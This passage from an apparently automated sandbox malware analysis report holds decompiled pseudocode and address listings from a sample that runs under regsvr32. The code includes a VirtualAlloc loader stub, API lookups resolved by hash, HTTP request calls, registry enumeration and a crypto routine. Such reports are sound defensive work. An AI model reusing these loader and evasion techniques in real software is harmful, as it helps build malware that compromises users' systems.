																																			_push( *(_t285 + 0x28));
																																			asm("int3");
																																			return _t150;
																																		}
																																	} else {
																																		goto L60;
																																	}
																																	goto L186;
																																	L59:
																																	asm("o16 nop [eax+eax]");
																																	_t42 = _t261 + 0x180; // 0x26d90a8
																																	_t261 =  *_t42;
																																} while (_t261 != 0);
																																goto L60;
																															}
																														}
																														goto L186;
																														L65:
																														_t283 = _t283 + 1;
																													} while (_t283 <  *_t273);
																													_t207 =  *(_t285 + 0x18);
																													_t272 =  *((intOrPtr*)(_t285 + 0x1c));
																													goto L67;
																												}
																											}
																										}
																									} else {
																										goto L46;
																									}
																									goto L186;
																									L45:
																									asm("o16 nop [eax+eax]");
																									_t33 = _t255 + 0x180; // 0x26d90a8
																									_t255 =  *_t33;
																								} while (_t255 != 0);
																								goto L46;
																							}
																						}
																					}
																				} else {
																					L36:
																					E00489510(_t285);
																					if( *((char*)(_t285 + 0x2c)) != 0) {
																						E0048BE30(_t285 + 0x28, _t272);
																					}
																					return 0;
																				}
																			} else {
																				goto L32;
																			}
																			goto L186;
																			L31:
																			asm("o16 nop [eax+eax]");
																			_t21 = _t250 + 0x180; // 0x26d90a8
																			_t250 =  *_t21;
																		} while (_t250 != 0);
																		goto L32;
																	}
																}
															} else {
																if( *((char*)(_t285 + 0x2c)) != 0) {
																	E0048BE30(_t285 + 0x28, _t272);
																}
																goto L25;
															}
														} else {
															_t174 = GetTokenInformation( *(_t285 + 0x44), 2, 0, 0, _t285 + 0x30); // executed
															if(_t174 == 0) {
																_t267 =  *0x49b1f4; // 0x26b1568
																if(_t267 == 0xc139578) {
																	 *0x49b1f4 = 0;
																	goto L155;
																} else {
																	if(_t267 == 0) {
																		L155:
																		_push(0xa1310f65);
																		_t213 = E00477564(0xa1310f65);
																		if(_t213 == 0) {
																			if(E00476C50(0xa1310f65) != 0) {
																				_push(0xa1310f65);
																				_t213 = E00477564(0xa1310f65);
																			}
																		}
																		if(_t213 == 0) {
																			goto L22;
																		} else {
																			_t285 = _t285 + 0xfffffff8;
																			_t179 = E004767C8(_t213, 0xea5f6acc);
																			goto L158;
																		}
																	} else {
																		do {
																			_t242 = 0;
																			_t182 = 0;
																			while( *((intOrPtr*)(_t182 + _t267 + 8)) != 0xea5f6acc) {
																				_t242 = _t242 + 1;
																				_t182 = _t182 + 0x18;
																				if(_t242 < 0x10) {
																					continue;
																				} else {
																					goto L154;
																				}
																				goto L186;
																			}
																			_t179 =  *((intOrPtr*)(_t182 + _t267 + 0x14));
																			if(_t179 != 0) {
																				L158:
																				if(_t179 == 0) {
																					goto L22;
																				} else {
																					asm("int3");
																					return _t179;
																				}
																			} else {
																				goto L155;
																			}
																			goto L186;
																			L154:
																			asm("o16 nop [eax+eax]");
																			_t77 = _t267 + 0x180; // 0x26d90a8
																			_t267 =  *_t77;
																		} while (_t267 != 0);
																		goto L155;
																	}
																}
															} else {
																goto L22;
															}
														}
													} else {
														goto L17;
													}
													goto L186;
													L16:
													asm("o16 nop [eax+eax]");
													_t12 = _t249 + 0x180; // 0x26d90a8
													_t249 =  *_t12;
												} while (_t249 != 0);
												goto L17;
											}
										}
									}
								}
							} else {
								goto L6;
							}
							goto L186;
							L5:
							asm("o16 nop [eax+eax]");
							_t4 = _t246 + 0x180; // 0x26d90a8
							_t246 =  *_t4;
						} while (_t246 != 0);
						goto L6;
					}
				}
				L186:
			}

0x004747b0
0x004747b0
0x004747b2
0x004747b5
0x004747bb
0x004747c9
0x004750e3
0x00000000
0x004747cf
0x004747d1
0x004747fe
0x00474803
0x00474809
0x0047480d
0x004750ba
0x004750c5
0x004750cb
0x004750cb
0x004750ba
0x00474815
0x00000000
0x0047481b
0x00474822
0x0047482a
0x00000000
0x0047482a
0x004747d3
0x004747d3
0x004747d3
0x004747d5
0x004747d7
0x004747e5
0x004747e6
0x004747ec
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004747ec
0x004750d2
0x004750d8
0x0047482c
0x0047482e
0x004748fc
0x00474903
0x00474834
0x00474838
0x00474839
0x0047483b
0x00474841
0x0047504d
0x00475054
0x0047507a
0x0047507c
0x00000000
0x0047507e
0x0047507e
0x0047507f
0x0047507f
0x00475056
0x0047505b
0x00475061
0x00475065
0x0047509d
0x004750a4
0x004750aa
0x004750aa
0x0047509d
0x00475069
0x0047508d
0x00475082
0x00000000
0x00475088
0x00000000
0x00475088
0x0047506b
0x00475072
0x00475075
0x00000000
0x00475075
0x00475069
0x00474847
0x00474847
0x0047484b
0x00474851
0x00474855
0x0047485a
0x00474868
0x00475038
0x00000000
0x0047486e
0x00474870
0x0047489d
0x004748a2
0x004748a8
0x004748ac
0x0047500f
0x0047501a
0x00475020
0x00475020
0x0047500f
0x004748b4
0x00000000
0x004748b6
0x004748bd
0x004748c5
0x00000000
0x004748c5
0x00474872
0x00474872
0x00474872
0x00474874
0x00474876
0x00474884
0x00474885
0x0047488b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0047488b
0x00475027
0x0047502d
0x004748c7
0x004748c9
0x004748e4
0x004748e4
0x004748ea
0x00474904
0x00474909
0x0047490e
0x0047491a
0x00474f51
0x00000000
0x00474920
0x00474922
0x0047494f
0x00474954
0x0047495a
0x0047495e
0x00474f28
0x00474f33
0x00474f39
0x00474f39
0x00474f28
0x00474966
0x00000000
0x00474968
0x0047496f
0x00474977
0x00000000
0x00474977
0x00474924
0x00474924
0x00474924
0x00474926
0x00474928
0x00474936
0x00474937
0x0047493d
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0047493d
0x00474f40
0x00474f46
0x00474979
0x0047497b
0x004749a3
0x004749ad
0x004749b8
0x004749b9
0x004749ba
0x004749bb
0x004749bd
0x004749c5
0x00474e71
0x00474e7d
0x00474f10
0x00000000
0x00474e83
0x00474e85
0x00474eae
0x00474eb3
0x00474eb9
0x00474ebd
0x00474ef5
0x00474efc
0x00474f02
0x00474f02
0x00474ef5
0x00474ec1
0x00000000
0x00474ec3
0x00474eca
0x00474ecd
0x00000000
0x00474ecd
0x00474e87
0x00474e87
0x00474e87
0x00474e89
0x00474e8b
0x00474e95
0x00474e96
0x00474e9c
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00474e9c
0x00474f06
0x00474f0c
0x00474ed2
0x00474ed4
0x00474ee5
0x00474eda
0x00000000
0x00474ee0
0x00000000
0x00474ee0
0x00474ed6
0x00474ed6
0x00474ed7
0x00474ed7
0x00474f0e
0x00000000
0x00474f0e
0x00000000
0x00474e9e
0x00474e9e
0x00474ea4
0x00474ea4
0x00474eaa
0x00000000
0x00474e87
0x00474e85
0x004749cb
0x004749cb
0x004749d6
0x004749df
0x004749e4
0x004749e9
0x004749ef
0x004749f7
0x00474a01
0x00474e62
0x00000000
0x00474a07
0x00474a09
0x00474a36
0x00474a3b
0x00474a41
0x00474a45
0x00474e39
0x00474e44
0x00474e4a
0x00474e4a
0x00474e39
0x00474a4d
0x00000000
0x00474a53
0x00474a5a
0x00474a62
0x00000000
0x00474a62
0x00474a0b
0x00474a0b
0x00474a0b
0x00474a0d
0x00474a0f
0x00474a1d
0x00474a1e
0x00474a24
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00474a24
0x00474e51
0x00474e57
0x00474a64
0x00474a66
0x00474bef
0x00474bf2
0x00474bfc
0x00474c02
0x00474c02
0x00474c0e
0x00474a6c
0x00474a76
0x00474a77
0x00474a78
0x00474a79
0x00474a7a
0x00474a7b
0x00474a7c
0x00474a7d
0x00474a82
0x00474a84
0x00474a86
0x00474a8b
0x00474d80
0x00474d8c
0x00474e21
0x00000000
0x00474d92
0x00474d94
0x00474dbf
0x00474dc4
0x00474dca
0x00474dce
0x00474e06
0x00474e0d
0x00474e13
0x00474e13
0x00474e06
0x00474dd2
0x00000000
0x00474dd4
0x00474ddb
0x00474dde
0x00000000
0x00474dde
0x00474d96
0x00474d98
0x00474d98
0x00474d9a
0x00474d9c
0x00474da6
0x00474da7
0x00474dad
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00474dad
0x00474e17
0x00474e1d
0x00474de3
0x00474de5
0x00474df6
0x00474deb
0x00000000
0x00474df1
0x00000000
0x00474df1
0x00474de7
0x00474de7
0x00474de8
0x00474de8
0x00474e1f
0x00000000
0x00474e1f
0x00000000
0x00474daf
0x00474daf
0x00474db5
0x00474db5
0x00474dbb
0x00000000
0x00474d98
0x00474d94
0x00474a91
0x00474a91
0x00474a91
0x00474a99
0x00474b47
0x00474b49
0x00474b54
0x00474b50
0x00474b50
0x00474b50
0x00474b5b
0x00474bcf
0x00474bd2
0x00474bdc
0x00474be2
0x00474be2
0x00474bee
0x00474b5d
0x00474b5d
0x00474b69
0x00474d2d
0x00000000
0x00474b6f
0x00474b71
0x00474ba0
0x00474ba5
0x00474bab
0x00474baf
0x00474d04
0x00474d0f
0x00474d15
0x00474d15
0x00474d04
0x00474bb7
0x00000000
0x00474bb9
0x00474bc0
0x00474bc3
0x00000000
0x00474bc3
0x00474b73
0x00474b75
0x00474b75
0x00474b77
0x00474b79
0x00474b87
0x00474b88
0x00474b8e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00474b8e
0x00474d1c
0x00474d22
0x00474bc8
0x00474bca
0x00000000
0x00474bcc
0x00474bcc
0x00474bcd
0x00474bce
0x00474bce
0x00474d28
0x00000000
0x00474d28
0x00000000
0x00474b90
0x00474b90
0x00474b96
0x00474b96
0x00474b9c
0x00000000
0x00474b75
0x00474b71
0x00474b69
0x00474a9f
0x00474aa1
0x00474aa5
0x00474aa9
0x00474aab
0x00474aaf
0x00474ab1
0x00474ab1
0x00474abd
0x00474d71
0x00000000
0x00474ac3
0x00474ac5
0x00474af4
0x00474af9
0x00474aff
0x00474b03
0x00474d48
0x00474d53
0x00474d59
0x00474d59
0x00474d48
0x00474b0b
0x00000000
0x00474b0d
0x00474b14
0x00474b17
0x00000000
0x00474b17
0x00474ac7
0x00474ac9
0x00474ac9
0x00474acb
0x00474acd
0x00474adb
0x00474adc
0x00474ae2
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00474ae2
0x00474d60
0x00474d66
0x00474b1c
0x00474b1e
0x00000000
0x00474b20
0x00474b20
0x00474b24
0x00474b28
0x00474b29
0x00474b29
0x00474d6c
0x00000000
0x00474d6c
0x00000000
0x00474ae4
0x00474ae4
0x00474aea
0x00474aea
0x00474af0
0x00000000
0x00474ac9
0x00474ac5
0x00000000
0x00474b32
0x00474b32
0x00474b33
0x00474b3b
0x00474b3f
0x00000000
0x00474b43
0x00474a99
0x00474a8b
0x00474e5d
0x00000000
0x00474e5d
0x00000000
0x00474a26
0x00474a26
0x00474a2c
0x00474a2c
0x00474a32
0x00000000
0x00474a0b
0x00474a09
0x00474a01
0x0047497d
0x0047497d
0x00474980
0x0047498a
0x00474990
0x00474990
0x0047499c
0x0047499c
0x00474f4c
0x00000000
0x00474f4c
0x00000000
0x0047493f
0x0047493f
0x00474945
0x00474945
0x0047494b
0x00000000
0x00474924
0x00474922
0x004748ec
0x004748f1
0x004748f7
0x004748f7
0x00000000
0x004748f1
0x004748cb
0x004748da
0x004748de
0x00474f60
0x00474f6c
0x00474fda
0x00000000
0x00474f6e
0x00474f70
0x00474f99
0x00474f9e
0x00474fa4
0x00474fa8
0x00474ff2
0x00474ff9
0x00474fff
0x00474fff
0x00474ff2
0x00474fac
0x00000000
0x00474fb2
0x00474fb9
0x00474fbc
0x00000000
0x00474fbc
0x00474f72
0x00474f72
0x00474f72
0x00474f74
0x00474f76
0x00474f80
0x00474f81
0x00474f87
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00474f87
0x00474fd0
0x00474fd6
0x00474fc1
0x00474fc3
0x00000000
0x00474fc9
0x00474fc9
0x00474fca
0x00474fca
0x00474fd8
0x00000000
0x00474fd8
0x00000000
0x00474f89
0x00474f89
0x00474f8f
0x00474f8f
0x00474f95
0x00000000
0x00474f72
0x00474f70
0x00000000
0x00000000
0x00000000
0x004748de
0x00475033
0x00000000
0x00475033
0x00000000
0x0047488d
0x0047488d
0x00474893
0x00474893
0x00474899
0x00000000
0x00474872
0x00474870
0x00474868
0x00474841
0x004750de
0x00000000
0x004750de
0x00000000
0x004747ee
0x004747ee
0x004747f4
0x004747f4
0x004747fa
0x00000000
0x004747d3
0x004747d1
0x00000000

APIs

GetTokenInformation.KERNELBASE(?,00000002,00000000,00000000,?), ref: 004748DA

Memory Dump Source

Source File: 00000004.00000002.2382349580.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_460000_regsvr32.jbxd

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: 81d77c90d3ea2fa9a8fea8cc0dbcdc6d5885506c9940fef753fac5bcdf17b018
Instruction ID: 353108b12d0b9b63fa3952ad8528033722683a9cef189ea0aaacabb6875735d5
Opcode Fuzzy Hash: 81d77c90d3ea2fa9a8fea8cc0dbcdc6d5885506c9940fef753fac5bcdf17b018
Instruction Fuzzy Hash: FE12E9207043429BDB24AA6689D57FB7299ABD0708F18C53FE54DCB352EB7CCC05869E

Uniqueness

Uniqueness Score: -1.00%

Function 0048C2D0, Relevance: 1.7, APIs: 1, Instructions: 196COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2382349580.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_460000_regsvr32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02b94c39eb1dd3cc4c03db39bb29c4b9ed014fec119dce0f03e24c3972616c08
Instruction ID: b444791125a743eb9e95c3392ec17f08d85ec404c19262ebbc936ce3e06e75a7
Opcode Fuzzy Hash: 02b94c39eb1dd3cc4c03db39bb29c4b9ed014fec119dce0f03e24c3972616c08
Instruction Fuzzy Hash: 1661C2315043009BD714EF25C8D0A6FB7E5AFC4758F14CE6EB85A97351EA38DC068BA6

Uniqueness

Uniqueness Score: -1.00%

Function 0047430F, Relevance: 1.7, APIs: 1, Instructions: 162COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(?), ref: 004740C1

Memory Dump Source

Source File: 00000004.00000002.2382349580.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_460000_regsvr32.jbxd

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: 9544bb9861835876c19db17ebede79ef0c2487f5b0909199585d65bf33764c14
Instruction ID: db6883f15133811bd3ec52962f8813dd3d57b63af7c1693587d4ed2365645b79
Opcode Fuzzy Hash: 9544bb9861835876c19db17ebede79ef0c2487f5b0909199585d65bf33764c14
Instruction Fuzzy Hash: ED51BC30A082408BD7289A29C4947FA7291EBD5304F29C56FD94D97396DB3CCC81D79A

Uniqueness

Uniqueness Score: -1.00%

Function 00493820, Relevance: 1.7, APIs: 1, Instructions: 151networkCOMMON

Download Yara Rule

APIs

HttpSendRequestW.WININET(D27F045A,?,D27F045A,?,00000000,D27F045A,336E58DC,?), ref: 0049390C

Memory Dump Source

Source File: 00000004.00000002.2382349580.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_460000_regsvr32.jbxd

Similarity

API ID: HttpRequestSend
String ID:
API String ID: 360639707-0
Opcode ID: 45434d5dd562494a7bb977f6259380fc62b3ef8793ff41ab8a72716ca37c981f
Instruction ID: 7619a6dfdc4e1bbde46d1cc1e5bacae8ffc51a466ba32036e27d756da1bfca7c
Opcode Fuzzy Hash: 45434d5dd562494a7bb977f6259380fc62b3ef8793ff41ab8a72716ca37c981f
Instruction Fuzzy Hash: D0519230608205ABDB20FF25CC51A6F7BE4AF81394F10493EB95597391EA38DD05CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 0048C580, Relevance: 1.6, APIs: 1, Instructions: 98registryCOMMON

Download Yara Rule

APIs

RegEnumValueA.KERNEL32(?,00000001,?,?,00000000,00000000,00000000,00000000,3AB94787,31FB9D90,?,?,3AB94787,31FB9D90), ref: 0048C5DB

Memory Dump Source

Source File: 00000004.00000002.2382349580.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_460000_regsvr32.jbxd

Similarity

API ID: EnumValue
String ID:
API String ID: 2814608202-0
Opcode ID: ba2a740820d52dbdc197a3ff1383e4a4d127e2da814062f69d33e0f1834dfbb0
Instruction ID: a99a3929786a871a46b648cbdf38b0af61fb0d9a1e2ac0305c239aef185ef083
Opcode Fuzzy Hash: ba2a740820d52dbdc197a3ff1383e4a4d127e2da814062f69d33e0f1834dfbb0
Instruction Fuzzy Hash: 1B31A1316082445BC375FA2AD891AEF73D8ABD4304F104D2EA18993241EE79AD458B66

Uniqueness

Uniqueness Score: -1.00%

Function 0048C405, Relevance: 1.6, APIs: 1, Instructions: 83registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNEL32(?,?,00000000,?,00000000,3AB94787,0D5493F9,?,00000000), ref: 0048C4BD

Memory Dump Source

Source File: 00000004.00000002.2382349580.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_460000_regsvr32.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 3dbe6f25ff54ebab37288e8af040a9a84130653229134a99384eae07c0fb49c0
Instruction ID: 95f66a3abd62f5ade2483a5b8748555e15bbe7c5f6933a11c2e6de763e821754
Opcode Fuzzy Hash: 3dbe6f25ff54ebab37288e8af040a9a84130653229134a99384eae07c0fb49c0
Instruction Fuzzy Hash: EE21A231604301ABCB15FF24C8D4A2FB3E1AFC4758F148E1EF85557291EA38EC058BAA

Uniqueness

Uniqueness Score: -1.00%

Function 0046543B, Relevance: 1.6, APIs: 1, Instructions: 76libraryCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(00000000,00000001,A1310F65,F3AF54A7,A1310F65,F3AF54A7), ref: 0046562E

Memory Dump Source

Source File: 00000004.00000002.2382349580.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_460000_regsvr32.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: d6243bf9e82aef2adf02c6885522ee42fb4da0036f6667b631e53cefb4f031b7
Instruction ID: b47544cf24c76cbb5a3bbe36e317ef689ef7b70ccb2bfc09fa5696b1c0441d3e
Opcode Fuzzy Hash: d6243bf9e82aef2adf02c6885522ee42fb4da0036f6667b631e53cefb4f031b7
Instruction Fuzzy Hash: 1621C4314087849BC736BB65C9627EF73E1AF94304F40882FE58A56292FF389945C79B

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 10002140, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 39
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 20%

			E10002140() {
				intOrPtr _t1;

				_t1 =  *0x10009aa8; // 0x3c400
				 *0x10009b14 = _t1;
				 *0x10009b18 = GetProcAddress(LoadLibraryA("kernel32"), "VirtualAlloc");
				_push(0x40);
				_push(0x3000);
				_push( *0x10009b14);
				_push( *0x10009af4);
				_push( *0x10009b18);
				_push(E100021B7);
				_push( *0x10009b18);
				return 0x40;
			}

0x10002143
0x10002148
0x10002164
0x1000216e
0x10002174
0x10002175
0x1000217b
0x10002181
0x100021b0
0x100021b5
0x100021b6

APIs

LoadLibraryA.KERNEL32(kernel32), ref: 10002157
GetProcAddress.KERNEL32(00000000,?,1000271F,00001EB1), ref: 1000215E

Strings

kernel32, xrefs: 10002152
VirtualAlloc, xrefs: 1000214D

Memory Dump Source

Source File: 00000004.00000002.2386194145.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.2386186538.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2386201334.0000000010004000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2386206956.0000000010008000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2386213840.000000001000A000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: VirtualAlloc$kernel32
API String ID: 2574300362-401495515
Opcode ID: 963216bc80cf7bcf5fe2b4d3c596aea17f71f21e2f9ca69f8f17d92a10b0a117
Instruction ID: e0a79a705473afd0ce7297c122d9c18ddeb67bb2f92d2573b301e258bf716086
Opcode Fuzzy Hash: 963216bc80cf7bcf5fe2b4d3c596aea17f71f21e2f9ca69f8f17d92a10b0a117
Instruction Fuzzy Hash: 4EE04FB1700220AFF7458B98DEE8EA13BA9F34C3E1B400024F641D327CDB3569808BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00487660, Relevance: 4.5, Strings: 3, Instructions: 793
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E00487660(intOrPtr* __ecx, signed int* _a4, signed int _a8) {
				signed int _v32;
				intOrPtr* _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _t203;
				signed int _t206;
				signed int* _t207;
				signed int* _t216;
				signed int _t217;
				signed int _t219;
				signed int _t221;
				signed int _t222;
				signed int _t225;
				signed int _t226;
				signed int _t227;
				signed int _t228;
				signed int _t229;
				signed int _t230;
				signed int _t231;
				signed int* _t234;
				signed int _t236;
				signed int _t237;
				signed int _t239;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int* _t248;
				signed int _t250;
				signed int _t251;
				signed int _t259;
				signed int _t262;
				void* _t264;
				signed int _t265;
				signed int _t266;
				signed int* _t269;
				signed int _t271;
				signed int _t272;
				signed int _t275;
				signed int _t280;
				signed int* _t281;
				signed int _t284;
				signed int _t286;
				signed int _t287;
				signed int _t288;
				signed int _t294;
				signed int _t298;
				signed int _t299;
				signed int _t300;
				intOrPtr _t303;
				signed int _t304;
				signed int _t305;
				signed int _t306;
				signed int _t308;
				signed int _t309;
				signed int _t311;
				signed int _t312;
				signed int _t313;
				signed int _t314;
				signed int _t315;
				signed int* _t316;
				signed int _t324;
				signed int _t326;
				unsigned int _t331;
				signed int _t333;
				signed int* _t335;
				signed int _t337;
				signed int* _t339;
				char _t340;
				char _t341;
				signed int _t343;
				intOrPtr* _t344;
				signed int _t345;
				signed int _t346;
				signed int _t347;
				signed int _t349;
				void* _t350;
				signed int _t351;
				signed int _t352;
				signed int _t353;
				signed int _t359;
				signed int _t361;
				signed int _t363;
				signed int _t365;
				signed int _t366;
				signed int _t367;
				unsigned int _t372;
				signed int _t374;
				signed int* _t376;
				signed int _t377;
				signed int _t378;
				intOrPtr* _t380;
				intOrPtr* _t382;
				signed int _t383;
				signed int _t384;
				signed int _t385;
				intOrPtr* _t386;
				void* _t387;
				signed int _t388;
				intOrPtr* _t390;
				unsigned int _t396;
				signed int _t398;
				void* _t399;
				signed int _t400;
				signed int _t401;
				intOrPtr _t402;
				signed int _t403;
				signed int _t404;
				signed int _t407;
				signed int _t414;
				signed int _t415;
				signed int _t422;
				signed int _t428;
				signed int _t429;
				unsigned int _t434;
				signed int _t437;
				void* _t439;
				void* _t441;

				_t439 = (_t437 & 0xfffffff0) - 0x34;
				_t390 = __ecx;
				_t303 =  *__ecx;
				if(_t303 != 0) {
					_t343 =  *( *( *(__ecx + 4)));
					__eflags = _t343;
					if(_t343 == 0) {
						L35:
						_push(0x40);
						_t284 = E00471030();
						_t439 = _t439 + 4;
						__eflags =  *_t390 - 1;
						 *_t284 = 0;
						if( *_t390 <= 1) {
							goto L203;
						} else {
							_t415 = 0x40;
							goto L37;
						}
					} else {
						__eflags =  *_t343;
						if( *_t343 == 0) {
							goto L35;
						} else {
							_t262 = _t343 & 0x0000000f;
							__eflags = _t262;
							if(_t262 == 0) {
								L16:
								asm("pxor xmm0, xmm0");
								_t294 =  ~( ~_t262 + 0x0000000f & 0x0000000f) + 0x7fffffff;
								__eflags = _t294;
								_v64 = _t294;
								_t429 = _t294;
								while(1) {
									asm("movdqu xmm1, [edx+eax]");
									asm("pcmpeqb xmm1, xmm0");
									asm("pmovmskb ebx, xmm1");
									__eflags = _t294;
									if(_t294 != 0) {
										break;
									}
									_t262 = _t262 + 0x10;
									__eflags = _t262 - _t429;
									if(_t262 < _t429) {
										continue;
									} else {
										_v64 = _t429;
										__eflags = _v64 - 0x7fffffff;
										if(_v64 >= 0x7fffffff) {
											L23:
											_v64 = 0x7fffffff;
										} else {
											_t275 = _t429;
											while(1) {
												__eflags =  *((char*)(_t275 + _t343));
												if( *((char*)(_t275 + _t343)) == 0) {
													break;
												}
												_t275 = _t275 + 1;
												__eflags = _t275 - 0x7fffffff;
												if(_t275 < 0x7fffffff) {
													continue;
												} else {
													goto L23;
												}
												goto L24;
											}
											_v64 = _t275;
										}
									}
									goto L24;
								}
								asm("bsf ebx, ebx");
								_v64 = _t294 + _t262;
							} else {
								_v64 = 0;
								_t299 = _v64;
								_t262 =  ~_t262 + 0x10;
								__eflags = _t262;
								while(1) {
									__eflags =  *((char*)(_t299 + _t343));
									if( *((char*)(_t299 + _t343)) == 0) {
										break;
									}
									_t299 = _t299 + 1;
									__eflags = _t299 - _t262;
									if(_t299 < _t262) {
										continue;
									} else {
										goto L16;
									}
									goto L24;
								}
								_v64 = _t299;
							}
							L24:
							_t264 = _v64 + 1;
							__eflags = _t264 - 0x40;
							_t265 =  <=  ? 0x40 : _t264;
							__eflags = _t265;
							if(_t265 > 0) {
								_t434 = (_t265 >> 5 >> 0x1a) + _t265 >> 6;
								_t266 = _t265 & 0x8000003f;
								__eflags = _t266;
								if(_t266 < 0) {
									_t266 = (_t266 - 0x00000001 | 0xffffffc0) + 1;
									__eflags = _t266;
								}
								__eflags = _t266;
								_t415 = _t434 + (0 | _t266 > 0x00000000) << 6;
								_push(_t415);
								_v68 = _t343;
								_t269 = E00471030();
								_t385 = _v68;
								_t339 = _t269;
								_t439 = _t439 + 4;
								_v60 = 0;
								_v44 = _t339;
								_v36 = _t390;
								 *_t339 = 0;
								_v68 =  *_t390;
								_t298 = _v60;
								_t404 = _v64;
								while(1) {
									_t271 =  *_t385;
									_t298 = _t298 + 1;
									 *_t339 = _t271;
									__eflags = _t404;
									if(_t404 == 0) {
										goto L33;
									}
									__eflags = _t298 - _t404;
									if(_t298 == _t404) {
										_t284 = _v44;
										_t272 = _v68;
										_t390 = _v36;
										_t339[0] = 0;
									} else {
										goto L33;
									}
									L206:
									__eflags = _t272 - 1;
									if(_t272 > 1) {
										goto L37;
									} else {
										goto L157;
									}
									goto L200;
									L33:
									__eflags = _t271;
									if(_t271 == 0) {
										_t284 = _v44;
										_t272 = _v68;
										_t390 = _v36;
									} else {
										_t339 =  &(_t339[0]);
										_t385 = _t385 + 1;
										__eflags = _t385;
										continue;
									}
									goto L206;
								}
							} else {
								_t284 = 0;
								__eflags = _t303 - 1;
								if(_t303 <= 1) {
									L203:
									_t344 = _a4;
									_t203 = 0;
									 *_t344 = 0;
									 *((intOrPtr*)(_t344 + 4)) = 0;
									__eflags = _t284;
									if(_t284 == 0) {
										goto L191;
									} else {
										goto L158;
									}
								} else {
									_t415 = 0;
									L37:
									_t36 =  &_a8; // 0x493877
									_t308 =  *_t36 & 0x0000000f;
									asm("pxor xmm0, xmm0");
									_t359 =  ~_t308 + 0x10;
									__eflags = _t359;
									_v52 = _t359;
									_v56 = _t308;
									_v48 = _t415;
									_v36 = _t390;
									_t400 = 1;
									goto L38;
									do {
										do {
											do {
												L38:
												__eflags = _a8;
												if(_a8 != 0) {
													_t363 = _a8;
													__eflags =  *_t363;
													if( *_t363 != 0) {
														__eflags = _t284 - _a8;
														if(_t284 != _a8) {
															_t229 = _v56;
															__eflags = _t229;
															if(_t229 == 0) {
																L46:
																asm("pxor xmm1, xmm1");
																_t422 =  ~( ~_t229 + 0x0000000f & 0x0000000f) + 0x7fffffff;
																__eflags = _t422;
																while(1) {
																	asm("movdqu xmm0, [ecx+eax]");
																	asm("pcmpeqb xmm0, xmm1");
																	asm("pmovmskb edx, xmm0");
																	__eflags = _t363;
																	if(_t363 != 0) {
																		break;
																	}
																	_t229 = _t229 + 0x10;
																	__eflags = _t229 - _t422;
																	if(_t229 < _t422) {
																		continue;
																	} else {
																		__eflags = _t422 - 0x7fffffff;
																		if(_t422 >= 0x7fffffff) {
																			L53:
																			_t422 = 0x7fffffff;
																		} else {
																			_t363 = _a8;
																			while(1) {
																				__eflags =  *((char*)(_t422 + _t363));
																				if( *((char*)(_t422 + _t363)) == 0) {
																					goto L54;
																				}
																				_t422 = _t422 + 1;
																				__eflags = _t422 - 0x7fffffff;
																				if(_t422 < 0x7fffffff) {
																					continue;
																				} else {
																					goto L53;
																				}
																				goto L54;
																			}
																		}
																	}
																	goto L54;
																}
																asm("bsf esi, edx");
																_t422 = _t422 + _t229;
															} else {
																_t229 = _v52;
																_t422 = 0;
																__eflags = 0;
																_t324 = _a8;
																_t363 = _t229;
																while(1) {
																	__eflags =  *((char*)(_t422 + _t324));
																	if( *((char*)(_t422 + _t324)) == 0) {
																		break;
																	}
																	_t422 = _t422 + 1;
																	__eflags = _t422 - _t363;
																	if(_t422 < _t363) {
																		continue;
																	} else {
																		_v52 = _t363;
																		goto L46;
																	}
																	goto L54;
																}
																_v52 = _t363;
															}
															L54:
															__eflags = _t284;
															if(_t284 == 0) {
